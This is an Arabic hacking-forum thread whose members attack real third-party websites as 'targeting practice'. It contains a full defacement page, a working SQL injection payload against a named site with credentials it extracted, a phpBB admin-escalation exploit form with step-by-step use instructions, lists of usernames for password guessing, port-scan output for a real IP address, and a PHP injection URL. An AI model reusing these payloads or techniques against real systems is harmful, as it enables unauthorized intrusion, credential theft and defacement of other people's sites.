بسم الله الرحمآن الرحيم الموضوع ذا جاي بهذف تقوية مهاراتكم في الاستهذاف، ان شاء الله نبدآ مع اول هذف سهل :) السيرفر التاني بشكر حبيب عبد الصمد على...

الحالة
مغلق و غير مفتوح للمزيد من الردود.
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
بسم الله الرحمآن الرحيم

الموضوع ذا جاي بهذف تقوية مهاراتكم في الاستهذاف،

ان شاء الله نبدآ مع اول هذف سهل :)


السيرفر التاني

بشكر حبيب عبد الصمد على السيرفر ان شاء الله نبدآ

ip:64.151.83.138

آندكس الاختراق :)

كود:
[COLOR=White]<script language="JavaScript">


<!--[/COLOR]  [COLOR=White]
// Hide the JavaScript from older browsers
(window.alert(" HACKED BY vbspiders_team")) 
// End hiding of script 
// -->
</script>vbspiders_team</title>
<body text="#00FF00" bgcolor="#000000">

<table border="1" width="100%" id="table2">[/COLOR] [COLOR=White]
    <tr>
        <td bordercolor="#FFFFFF" bordercolorlight="#FF00FF" bordercolordark="#FF0000">

<p align="center">&nbsp;</p>[/COLOR] [COLOR=White]
        <p align="center"><font color="#FFFFFF" face="Tahoma" size="5">
--------------------------------------------------</font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="5">بســم الله الرحمن 
الرحـــيم</font></p>
<p align="center" dir="rtl"><font color="#FFFFFF" face="Tahoma" size="5">
--------------------------------------------------</font></p>
        <p>&nbsp;</td>
    </tr>
</table>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl"><font face="Tahoma" size="5">فريـــق شبـــكة 
العنــــاكب الإحتـــرافية</font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="6" color="#FFFF99"><span lang="fr">
vbspiders_team</span></font></p>
<p align="center" dir="rtl"><font color="#00FFFF" size="5" face="Tahoma">
عــــالم الإبداع والمعرفة</font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="7"><span lang="fr">
<a href="http://WwW.vBspidErs.CoM"><font color="#FFFFFF">WwW.</font><font color="#FF0000">v</font><font color="#C0C0C0">B</font><font color="#FFFF00">s</font><font color="#FF00FF">p</font><font color="#800080">i</font><font color="#800000">d</font><font color="#FF9999">E</font><font color="#FF3300">r</font><font color="#00FFFF">s</font><font color="#FFFFFF">.CoM</font></a></span></font></p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FF9900">\ \ \ \ \ \ \ \ 
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ 
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </font><font color="#FF00FF"></p>
<p align="center" dir="rtl">
<font face="Tahoma">
<img border="0" src="http://upload.traidnt.net/upfiles/FsW42876.jpg" width="658" height="646"></font></p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FF9900">\ \ \ \ \ \ \ \ 
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ 
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ </font></p>
</font>
<p align="center" dir="rtl"><font face="Tahoma" color="#FFFFFF" size="6">
<span lang="fr">__________________________________</span></font></p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FF0000"><span lang="fr">
<font size="6">هذا الإختــراق</font></span><font size="6"> </font>
<span lang="fr"><font size="6">من اجل صقل مهارات الفريق</font></span></font></p>
<p align="center" dir="rtl"><font face="Tahoma" size="6" color="#FF0000">في 
استهذاف المواقع والسيرفرات</font></p>
<p align="center" dir="rtl"><font color="#FFFFFF" face="Tahoma" size="6"><span lang="fr">__________________________________</span></font></p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl"><font face="Tahoma" color="#FFFFFF"><span lang="fr">
<font size="5">تم الإختـــراق من قبـــل</font></span><font size="5"> فريق&nbsp; 
العنـــاكب </font></font></p>
<p align="center" dir="rtl">
<font size="6" face="Tahoma"><span lang="fr">vbspiders</span>
<span lang="fr">team</span></font></p>
<p align="center" dir="rtl"><span lang="fr">
<font size="5" face="Tahoma" color="#FFFFFF">إهـــداء 
الى كـــافة أعضـــاء شبــكة العناكب</font></span></p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl">&nbsp;</p>
<table border="1" width="100%" id="table1">
    <tr>
        <td>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl">&nbsp;</p>
<p align="center" dir="rtl"><font size="5" face="Tahoma" color="#FF00FF">سألت الحياة متي تكونين 
صديقة لي ....<br>
فجاوبتني عندما يكون الاختراق رفيقا لك</font></p>
<p align="center" dir="rtl">&nbsp;</p>
        <p>&nbsp;</td>
    </tr>
</table>
  
  <script language="JavaScript1.2">               

/*****************************************[/COLOR] [COLOR=White]
* Visit our site at http://www.star28.com/ for more code
* This notice must stay intact for use
***********************************************/            
//change 1 to another integer to alter the scroll speed. Greater is faster               
var speed=1               
var currentpos=0,alt=1,curpos1=0,curpos2=-1               
function initialize(){               
startit()               
}               
function scrollwindow(){               
if (********.all)               
temp=********.body.scrollTop               
else               
temp=window.pageYOffset               
if (alt==0)               
alt=1               
else               
alt=0               
if (alt==0)               
curpos1=temp               
else               
curpos2=temp               
if (curpos1!=curpos2){               
if (********.all)               
currentpos=********.body.scrollTop+speed               
else               
currentpos=window.pageYOffset+speed               
window.scroll(0,currentpos)               
}               
else{               
currentpos=30               
window.scroll(0,currentpos)               
}               
}               
function startit(){               
setInterval("scrollwindow()",30)               
}               
window.onload=initialize               
</script>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>[/COLOR]

:grrrrrr:
 
التعديل الأخير:

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
ههههه أجل سهلة يا نوردين في ثغرة حقن جاري الحقن
 

sh-jaf

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
بارك الله فيك

شكرا لك أخي nor15din
استخرجت أكثر من موقع مصاب لكن هي هي المشكلة عندي اليوزر و الباس لا يعملان بعد استخراجهم فهل ابعث لك الحقن لتكتشف خطأي
جزاك الله خير .
 
التعديل الأخير:

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
تم حقن موقع لكن الباسوورد لا يعمل اضن انه احد ما اخترقه وغير الباسوورد
 

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
تبا ما بها هذه المواقع كل باسورداتها لا تعمل هاذا الموقع ايضا مثل الاول
هذه هي لوحة التحكم
http://www.soussanart.com/cpanel
 

sh-jaf

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
لعلو

ما بقي إلا أشوف ثغرة في Powered by phpBB © 2001
ان شاء الله نشوف
 

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
ما بقي إلا أشوف ثغرة في Powered by phpBB © 2001
ان شاء الله نشوف

أجل في ثغرة اخي هاذا هو المنتدى
http://www.cheela.org

وهاذا هو استغلال الثغرة

يجب اولا التسجيل في المنتدى
<font color="Blue" size="6">
ثم احفظ الايد تبعك يعني رقم العضوية
ثم افتح مفكرة جديدة
واكتب فيها هاذا الكود
PHP:
<html> 
<head> 
</head> 
******> 
 
<form method="post"  
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"> 
User Level: <select name="userlevel"> 
<option value="admin">Administrator</option> 
<option value="user">User</option></select> 
<input type="hidden" name="private***91;1***93;" value="0"> 
<input type="hidden" name="moderator***91;1***93;" value="0"> 
<input type="hidden" name="mode" value="user"> 
<input type="hidden" name="adv" value=""> 
User Number: <input type="text" name="u" size="5"> 
<input type="submit" name="submit" value="Submit"> 
 
</form> 
</body> 
</html>
ثم عدل على الكود بالموقع الذي تريد اختراقه
ضع الموقع في مكان هاذا الرابط
http://www.domain_name
/board_directory

ثم احفض المفكرة بصيغة html

عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك

 
التعديل الأخير:

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
لكن المشكة مضحكة في هاذا الموقع انه لم استطع التسجيل في دائما تظهر لي هذه الرسالة
Votre réponse est inexacte, réessayez Svp.

رابط التسجيلhttp://www.cheela.org/cheelfor/profile.php
 

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
ارجو تثبيت الموضوع لانه مفيد للمبتدئين
 

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
بدات امل لم استطع التسجيل في المنتدى حتى الان يلعن هيك مواقع يقول لك Quel est votre animal de compagnie préféré
وعندما اكتب شيء تظهر هذه
Votre réponse est inexacte, réessayez Svp.
 

sh-jaf

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
جرب التخمين
هذي اليوزرات
arttime
davidger
diaspo
kameo
manitou
lelien
editravl
sourceis
isrtkd


:intello::intello::intello::intello:
 

abdellatef

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
اخوي نور الدين فكر الادارة بقسم الاستهداف الجميع محتاج لو هدا الصيف لاكتساب مهارات في تخطي الحمايات واستهداف السرفرات
ومتل هدا سيكون بالقسم وضع سرفر ويتم التسابق عليه ويتم عمل شرح لاختراق الهدف
 

neo-m

Dark magician
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
جزاك الله خير حصل معي شيء مش فاهم انا دخلت وين عضو او غير ذلك
لكن ممكن تجرب وتقلي
هذا الرابط
http://www.cheela.org
اليوزر vbondoux
الباس alliance
ارجو الرد
و هذه الحقنة
http://www.cheela.org/rav.php?id=-1 UNION SELECT 1,2,concat(login,0x3e,pass),4+from+TH_Users--

ماذا تقصد يا اخي اليوزر والباسوورد صحيحين vbondoux اليوزر
alliance الباس

وهذه لوحة التحكم
http://www.cheela.org/admin/
 
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
او جربو الاختراق المتقدم
وهذي البورتات المفتوحه
Discovered open port 3306/tcp on 216.246.55.247

Discovered open port 21/tcp on 216.246.55.247

Discovered open port 995/tcp on 216.246.55.247

Discovered open port 25/tcp on 216.246.55.247

Discovered open port 143/tcp on 216.246.55.247

Discovered open port 110/tcp on 216.246.55.247

Discovered open port 111/tcp on 216.246.55.247

Discovered open port 993/tcp on 216.246.55.247

Discovered open port 80/tcp on 216.246.55.247

Discovered open port 53/tcp on 216.246.55.247

Discovered open port 443/tcp on 216.246.55.247

Increasing send delay for 216.246.55.247 from 0 to 5 due to 66 out of 164 dropped probes since last increase.

SYN Stealth Scan Timing: About 29.73% done; ETC: 00:46 (0:01:13 remaining)

Discovered open port 465/tcp on 216.246.55.247

Discovered open port 1/tcp on 216.246.55.247

Discovered open port 26/tcp on 216.246.55.247

Discovered open port 8443/tcp on 216.246.55.247





النظام :Linux 2.4.X
 

sh-jaf

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
السلام عليكم

اخواني وجدت هذا الرابط لكن لأني مبتديء لا أعرف هل يفيدنا أم لا
لأنو فيه أكواد php ممكن تجربو و تردولي الله يحفظم
http://www.cheela.org/index.old?page=%3C?=%20$page+1%20?%3E
 
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
جزاك الله خير حصل معي شيء مش فاهم انا دخلت وين عضو او غير ذلك
لكن ممكن تجرب وتقلي
هذا الرابط
http://www.cheela.org
اليوزر vbondoux
الباس alliance
ارجو الرد
و هذه الحقنة
http://www.cheela.org/rav.php?id=-1 UNION SELECT 1,2,concat(login,0x3e,pass),4+from+TH_Users--
http://www.cheela.org/admin/
هم حادفين اللوحه ههه اكيد عارفين موقعهم مصاب
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
أعلى